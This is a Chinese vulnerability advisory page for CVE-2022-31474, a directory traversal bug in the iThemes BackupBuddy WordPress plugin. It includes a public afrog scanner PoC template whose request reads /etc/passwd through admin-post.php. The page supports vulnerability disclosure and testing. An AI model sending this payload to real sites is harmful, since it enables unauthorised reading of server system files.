CVE-2022-31474: CVE-2022-31474

日期: 2025-09-01 | 影响软件: CVE-2022-31474 | POC: 已公开

漏洞描述

iThemes BackupBuddy 插件 8.5.8.0 - 8.7.4.1 版本中的目录遍历漏洞。

PoC代码[已公开]

id: CVE-2022-31474
 
info:   
  name: CVE-2022-31474
  author: zhizhuo  
  severity: high    
  verified: true  
  description: |   
   iThemes BackupBuddy 插件 8.5.8.0 - 8.7.4.1 版本中的目录遍历漏洞。
  reference: 
  - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-31474
 
rules:  
  verify:  
    request:  
      method: GET  
      path: /wp-admin/admin-post.php?page=pb_backupbuddy_destinations&local-destination-id=wp-config&local-download=/etc/passwd
    expression: response.status == 200 && response.body.bcontains(b'/bin/bash') && response.body.bcontains(b'root')
expression: verify()

来源: https://github.com/zan8in/afrog/blob/main/pocs/afrog-pocs/CVE/2022/CVE-2022-31474.yaml

漏洞描述

PoC代码[已公开]

相关漏洞推荐

Webmin /package-updates/update.cgi 命令执行漏洞（CVE-2022-36446） 无POC

CVE-2022-0342: Zyxel authentication bypass patch analysis POC

CVE-2022-0434: WordPress Page Views Count <2.4.15 - SQL Injection POC

CVE-2022-0540: Atlassian Jira - Authentication bypass in Seraph POC

CVE-2022-0656: uDraw <3.3.3 - Local File Inclusion POC

Webmin /package-updates/update.cgi 命令执行漏洞（CVE-2022-36446）无POC